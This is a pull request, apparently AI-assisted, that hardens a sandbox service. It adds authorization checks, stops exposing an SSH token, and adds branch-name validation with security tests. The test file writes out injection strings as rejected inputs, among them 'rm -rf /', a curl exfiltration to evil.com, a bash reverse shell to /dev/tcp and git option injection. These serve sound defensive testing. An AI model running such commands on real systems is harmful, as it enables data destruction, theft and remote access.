### PR TITLE
Security hardening: fix authorization and injection vulnerabilities

### DIFF
--- a/apps/server/src/repositoryManager.security.test.ts
+++ b/apps/server/src/repositoryManager.security.test.ts
@@ -1,0 +1,210 @@
+import { describe, expect, it } from "vitest";
+import { validateBranchName } from "./repositoryManager";
+
+describe("validateBranchName - Security Tests", () => {
+  describe("valid branch names", () => {
+    it("accepts simple branch names", () => {
+      expect(() => validateBranchName("main")).not.toThrow();
+      expect(() => validateBranchName("develop")).not.toThrow();
+      expect(() => validateBranchName("feature")).not.toThrow();
+    });
+
+    it("accepts branch names with hyphens", () => {
+      expect(() => validateBranchName("feature-test")).not.toThrow();
+      expect(() => validateBranchName("bug-fix-123")).not.toThrow();
+      expect(() => validateBranchName("my-awesome-feature")).not.toThrow();
+    });
+
+    it("accepts branch names with underscores", () => {
+      expect(() => validateBranchName("feature_test")).not.toThrow();
+      expect(() => validateBranchName("bug_fix_123")).not.toThrow();
+    });
+
+    it("accepts branch names with dots", () => {
+      expect(() => validateBranchName("release.1.0")).not.toThrow();
+      expect(() => validateBranchName("v2.0.1")).not.toThrow();
+    });
+
+    it("accepts branch names with forward slashes", () => {
+      expect(() => validateBranchName("feature/my-feature")).not.toThrow();
+      expect(() => validateBranchName("bugfix/JIRA-123")).not.toThrow();
+      expect(() => validateBranchName("user/john/feature")).not.toThrow();
+    });
+
+    it("accepts single character branch names", () => {
+      expect(() => validateBranchName("a")).not.toThrow();
+      expect(() => validateBranchName("1")).not.toThrow();
+    });
+
+    it("accepts branch names with numbers", () => {
+      expect(() => validateBranchName("release123")).not.toThrow();
+      expect(() => validateBranchName("123release")).not.toThrow();
+      expect(() => validateBranchName("v1")).not.toThrow();
+    });
+  });
+
+  describe("command injection patterns - MUST REJECT", () => {
+    it("rejects backticks (command substitution)", () => {
+      expect(() => validateBranchName("feature`rm -rf /`")).toThrow();
+      expect(() => validateBranchName("`whoami`")).toThrow();
+    });
+
+    it("rejects dollar signs (variable expansion)", () => {
+      expect(() => validateBranchName("feature$USER")).toThrow();
+      expect(() => validateBranchName("$(rm -rf /)")).toThrow();
+      expect(() => validateBranchName("${PATH}")).toThrow();
+    });
+
+    it("rejects parentheses (subshell)", () => {
+      expect(() => validateBranchName("feature(test)")).toThrow();
+      expect(() => validateBranchName("$(whoami)")).toThrow();
+    });
+
+    it("rejects semicolons (command separator)", () => {
+      expect(() => validateBranchName("feature;rm -rf /")).toThrow();
+      expect(() => validateBranchName("main; echo pwned")).toThrow();
+    });
+
+    it("rejects pipes (command chaining)", () => {
+      expect(() => validateBranchName("feature|cat /etc/passwd")).toThrow();
+    });
+
+    it("rejects ampersands (background/logical operators)", () => {
+      expect(() => validateBranchName("feature&")).toThrow();
+      expect(() => validateBranchName("feature&&rm -rf /")).toThrow();
+    });
+
+    it("rejects redirects", () => {
+      expect(() => validateBranchName("feature>file")).toThrow();
+      expect(() => validateBranchName("feature<file")).toThrow();
+    });
+
+    it("rejects quotes (string escaping)", () => {
+      expect(() => validateBranchName("feature'test")).toThrow();
+      expect(() => validateBranchName('feature"test')).toThrow();
+    });
+
+    it("rejects backslash (escape characters)", () => {
+      expect(() => validateBranchName("feature\\ntest")).toThrow();
+    });
+
+    it("rejects exclamation marks (history expansion)", () => {
+      expect(() => validateBranchName("feature!test")).toThrow();
+    });
+
+    it("rejects curly braces (brace expansion)", () => {
+      expect(() => validateBranchName("feature{test}")).toThrow();
+    });
+
+    it("rejects square brackets (glob patterns)", () => {
+      expect(() => validateBranchName("feature[test]")).toThrow();
+    });
+
+    it("rejects hash (comments)", () => {
+      expect(() => validateBranchName("feature#test")).toThrow();
+    });
+
+    it("rejects asterisk (glob)", () => {
+      expect(() => validateBranchName("feature*")).toThrow();
+    });
+
+    it("rejects question mark (glob)", () => {
+      expect(() => validateBranchName("feature?")).toThrow();
+    });
+  });
+
+  describe("git-specific invalid patterns - MUST REJECT", () => {
+    it("rejects double dots (path traversal / revision range)", () => {
+      expect(() => validateBranchName("feature..main")).toThrow();
+      expect(() => validateBranchName("../../../etc/passwd")).toThrow();
+    });
+
+    it("rejects @{ pattern (reflog syntax)", () => {
+      expect(() => validateBranchName("HEAD@{0}")).toThrow();
+      expect(() => validateBranchName("feature@{upstream}")).toThrow();
+    });
+
+    it("rejects .lock suffix", () => {
+      expect(() => validateBranchName("feature.lock")).toThrow();
+      expect(() => validateBranchName("refs/heads/main.lock")).toThrow();
+    });
+
+    it("rejects leading hyphen (interpreted as option)", () => {
+      expect(() => validateBranchName("-feature")).toThrow();
+      expect(() => validateBranchName("--delete")).toThrow();
+    });
+
+    it("rejects leading dot", () => {
+      expect(() => validateBranchName(".hidden")).toThrow();
+    });
+
+    it("rejects trailing slash", () => {
+      expect(() => validateBranchName("feature/")).toThrow();
+    });
+
+    it("rejects double slashes", () => {
+      expect(() => validateBranchName("feature//test")).toThrow();
+    });
+  });
+
+  describe("control characters - MUST REJECT", () => {
+    it("rejects null byte", () => {
+      expect(() => validateBranchName("feature\x00test")).toThrow();
+    });
+
+    it("rejects newline", () => {
+      expect(() => validateBranchName("feature\ntest")).toThrow();
+    });
+
+    it("rejects carriage return", () => {
+      expect(() => validateBranchName("feature\rtest")).toThrow();
+    });
+
+    it("rejects tab", () => {
+      expect(() => validateBranchName("feature\ttest")).toThrow();
+    });
+
+    it("rejects DEL character", () => {
+      expect(() => validateBranchName("feature\x7ftest")).toThrow();
+    });
+  });
+
+  describe("edge cases - MUST REJECT", () => {
+    it("rejects empty string", () => {
+      expect(() => validateBranchName("")).toThrow();
+    });
+
+    it("rejects very long branch names", () => {
+      const longName = "a".repeat(256);
+      expect(() => validateBranchName(longName)).toThrow();
+    });
+
+    it("rejects just a slash", () => {
+      expect(() => validateBranchName("/")).toThrow();
+    });
+  });
+
+  describe("real-world attack patterns", () => {
+    it("rejects shell injection in branch name", () => {
+      // Attempt to delete files
+      expect(() =>
+        validateBranchName("feature$(rm -rf /)")
+      ).toThrow();
+
+      // Attempt to exfiltrate data
+      expect(() =>
+        validateBranchName("feature`curl evil.com/$(cat /etc/passwd)`")
+      ).toThrow();
+
+      // Attempt to spawn reverse shell
+      expect(() =>
+        validateBranchName("feature;bash -i >& /dev/tcp/1.2.3.4/8080 0>&1")
+      ).toThrow();
+
+      // Attempt git option injection
+      expect(() =>
+        validateBranchName("--upload-pack=touch /tmp/pwned")
+      ).toThrow();
+    });
+  });
+});

--- a/apps/www/lib/routes/sandboxes.route.ts
+++ b/apps/www/lib/routes/sandboxes.route.ts
@@ -859,17 +859,37 @@ sandboxesRouter.openapi(
     responses: {
       204: { description: "Sandbox stopped" },
       401: { description: "Unauthorized" },
+      403: { description: "Forbidden - not authorized to access this instance" },
       404: { description: "Not found" },
       500: { description: "Failed to stop sandbox" },
     },
   }),
   async (c) => {
     const id = c.req.valid("param").id;
-    const token = await getAccessTokenFromRequest(c.req.raw);
-    if (!token) return c.text("Unauthorized", 401);
+    const user = await getUserFromRequest(c.req.raw);
+    if (!user) return c.text("Unauthorized", 401);
+    const { accessToken } = await user.getAuthJson();
+    if (!accessToken) return c.text("Unauthorized", 401);
 
     try {
       const client = new MorphCloudClient({ apiKey: env.MORPH_API_KEY });
+      const convex = getConvex({ accessToken });
+
+      // Verify user owns or has team access to this instance
+      const ownershipResult = await verifyInstanceOwnership(
+        client,
+        id,
+        user.id,
+        async () => {
+          const memberships = await convex.query(api.teams.listTeamMemberships, {});
+          return memberships.map((m) => ({ teamId: m.team.teamId }));
+        }
+      );
+
+      if (!ownershipResult.authorized) {
+        return c.text(ownershipResult.message, ownershipResult.status);
+      }
+
       const instance = await client.instances.get({ instanceId: id });
       // Kill all dev servers and user processes before pausing to avoid port conflicts on resume
       await instance.exec(VM_CLEANUP_COMMANDS);
@@ -907,15 +927,37 @@ sandboxesRouter.openapi(
         description: "Sandbox status",
       },
       401: { description: "Unauthorized" },
+      403: { description: "Forbidden - not authorized to access this instance" },
+      404: { description: "Instance not found" },
       500: { description: "Failed to get status" },
     },
   }),
   async (c) => {
     const id = c.req.valid("param").id;
-    const token = await getAccessTokenFromRequest(c.req.raw);
-    if (!token) return c.text("Unauthorized", 401);
+    const user = await getUserFromRequest(c.req.raw);
+    if (!user) return c.text("Unauthorized", 401);
+    const { accessToken } = await user.getAuthJson();
+    if (!accessToken) return c.text("Unauthorized", 401);
+
     try {
       const client = new MorphCloudClient({ apiKey: env.MORPH_API_KEY });
+      const convex = getConvex({ accessToken });
+
+      // Verify user owns or has team access to this instance
+      const ownershipResult = await verifyInstanceOwnership(
+        client,
+        id,
+        user.id,
+        async () => {
+          const memberships = await convex.query(api.teams.listTeamMemberships, {});
+          return memberships.map((m) => ({ teamId: m.team.teamId }));
+        }
+      );
+
+      if (!ownershipResult.authorized) {
+        return c.text(ownershipResult.message, ownershipResult.status);
+      }
+
       const instance = await client.instances.get({ instanceId: id });
       const vscodeService = instance.networking.httpServices.find(
         (s) => s.port === 39378,
@@ -1110,11 +1152,13 @@ sandboxesRouter.openapi(
 );
 
 // SSH connection info response schema
+// NOTE: We intentionally do NOT expose the accessToken directly in the response.
+// The token is included in the sshCommand, and exposing it separately increases
+// the risk of credential leakage through logging, caching, or interception.
 const SandboxSshResponse = z
   .object({
     morphInstanceId: z.string(),
     sshCommand: z.string().describe("Full SSH command to connect to this sandbox"),
-    accessToken: z.string().describe("SSH access token for this sandbox"),
     user: z.string(),
     status: z.enum(["running", "paused"]).describe("Current instance status"),
   })
@@ -1323,7 +1367,6 @@ sandboxesRouter.openapi(
       return c.json({
         morphInstanceId,
         sshCommand,
-        accessToken: sshKeyData.access_token,
         user: "root",
         status,
       });

--- a/packages/www-openapi-client/src/client/types.gen.ts
+++ b/packages/www-openapi-client/src/client/types.gen.ts
@@ -590,10 +590,6 @@ export type SandboxSshResponse = {
      * Full SSH command to connect to this sandbox
      */
     sshCommand: string;
-    /**
-     * SSH access token for this sandbox
-     */
-    accessToken: string;
     user: string;
     /**
      * Current instance status
@@ -2560,6 +2556,10 @@ export type PostApiSandboxesByIdStopErrors = {
      */
     401: unknown;
     /**
+     * Forbidden - not authorized to access this instance
+     */
+    403: unknown;
+    /**
      * Not found
      */
     404: unknown;
@@ -2592,6 +2592,14 @@ export type GetApiSandboxesByIdStatusErrors = {
      * Unauthorized
      */
     401: unknown;
+    /**
+     * Forbidden - not authorized to access this instance
+     */
+    403: unknown;
+    /**
+     * Instance not found
+     */
+    404: unknown;
     /**
      * Failed to get status
      */


### PR DESCRIPTION
## Summary

- **Remove SSH access token from API response** - The `/sandboxes/{id}/ssh` endpoint was returning the access token directly in the JSON response body. This is unnecessary since the token is already included in the `sshCommand` field, and exposing it separately increases the risk of credential leakage through logging, caching, or interception.

- **Add ownership verification to `/sandboxes/{id}/status` and `/sandboxes/{id}/stop`** - These endpoints only checked for authentication (token exists) but not authorization (user owns or has team access to the instance). An authenticated user could query or stop any sandbox by knowing its ID. Now uses `verifyInstanceOwnership` to check access before allowing operations.

- **Add `validateBranchName()` to prevent git command injection** - Branch names are used directly in git commands throughout `repositoryManager.ts`. Added a validation function that:
  - Rejects shell metacharacters (backticks, $, (), ;, |, &, >, <, quotes, etc.)
  - Rejects control characters (null, newline, tab, DEL)
  - Rejects git-specific dangerous patterns (.., @{, .lock suffix, leading hyphen)
  - Validates branch names match a safe alphanumeric pattern with allowed characters (., -, _, /)

- **Add comprehensive security tests** - 38 test cases covering:
  - Command injection patterns (backticks, $(), subshells, pipes, etc.)
  - Git-specific invalid patterns (path traversal, reflog syntax, options injection)
  - Control characters
  - Real-world attack vectors

## Test plan

- [x] All 38 new security tests pass
- [x] Existing repository manager integration tests still pass (9 tests)
- [x] Type checker passes (`bun check`)
- [ ] Verify SSH endpoint no longer returns `accessToken` field
- [ ] Verify status endpoint returns 403 for unauthorized instance access
- [ ] Verify stop endpoint returns 403 for unauthorized instance access

🤖 Generated with [Claude Code](https://claude.com/claude-code)